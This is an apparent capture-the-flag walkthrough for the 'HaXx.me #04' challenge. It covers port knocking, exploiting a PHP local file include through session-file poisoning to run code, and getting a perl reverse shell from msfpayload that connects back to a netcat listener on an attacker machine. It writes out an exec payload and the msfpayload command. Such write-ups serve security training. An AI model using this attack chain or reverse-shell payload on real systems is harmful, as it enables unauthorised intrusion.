Beruflich Dokumente
Kultur Dokumente
HaXx.me #04
haxlog
1) The Main Gateway
The game starts with the web page shown above. The clue asks for a text record for 127.0.0.1 from me.
The htmlcomments might be a hint, along with the web server reporting back as fake404.intern0t.net. The hint from
theninja text record stated, go to the default webpage of the web server.
The page that is returned when requesting index.html from the root of the web server looks similar to the page
returned for the root of the web server. One difference is the server name returned is not fake404.intern0t.net.
checking the traffic in fiddler2 shows the following.
Turns out that the page returned from the root of the webserver is not a 404, its also 721 bytes larger than a acutal 404
Scrolling to the bottom of the fake 404 page the following html comment is shown.
<!--01011001 01101111 01110101 00100000 01101011 01101110 01101111
01110111 00101100 00100000 01101001 01100110 00100000 01111001
01101111 01110101 00100111 01110010 01100101 00100000 01110011
01110100 01110101 01100011 01101011 00100000 01101111 01101110
00100000 01110100 01101000 01100101 00100000 01101110 01110101
01101101 01100010 01100101 01110010 01110011 00101100 00100000
01110100 01110010 01111001 00100000 01101011 01101110 01101111
01100011 01101011 01101001 01101110 01100111 00100001-->
Converting from binary to ASCII the above is translated into
“You know, if you're stuck on the numbers, try knocking!”
The A simple nmap scan shows that 53 and 80 are open ports. With ports 1, 3306, and 31337 being filtered
The ninja code could be a port knocking sequence? Try running the knock client against the server
After running the knock sequence a rescan from nmap shows that port 31337 is now open
2) The Ninja
Include /etc/ninja? A look at the source for this page may offer a deeper insight
A quick check of the source shows the comment <!- -include ($input) // input is a registered global - ->
A rescan with nmap shows that port 1 on the server is now open
3) The Base
The Final Destination page has a link to tarball that contains the source for baselogin.php (border control login) and
controlroom.php (The Final Destination) pages.
A quick review shows that the board control login page(baselogin.php) uses guest and pass as hardcoded credentials
and when they are used the page redirects to the controlroom.php
Moving on to the controlroom.php page source, the following list of ASCII (in hex) is listed in another html comment that
appears to be a hint.
\x53\x65\x73\x73\x69\x6f\x6e\x20\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x3a\x20\x2f\x76\x61\x72\x2f\x6c\x69\
x62\x2f\x70\x68\x70\x35\x2f
Dumping the hex in tiny hexer show the following ASCII
Next the source shows that the user variable is included by the php code.
It would seem the page is vulnerable to a local file include and the php session directory is /var/lib/php5/
Grab the PHPSESSID and set the user variable to the session file as shown below
Setting the php session password variable to <?php echo exec('whoami');?> using the baseindex.php page and then
reloading the controlroom.php page with the user variable set as the session file shows the following info
It would seem that perl is available. Using the following msfpayload command a perl reverse shell can be built
msfpayload php/reverse_perl LHOST=MYIP LPORT=2024 R
Then setup a netcat listener on a attacker controlled machine.
After which setting the php session password variable to the output of the msfpayload command wrapped in php tags
using the baseindex.php page and then reloading the controlroom.php page with the user variable set as then session
file
shell access as www-data . A process list shown below divulges a netcat listener running as root. Well that was easy.
Next dump the shellcode from the text file to a bin file and then use msfencode to build a exe quick
As the shellcode is all inside of the text segment it will need to be set to full access.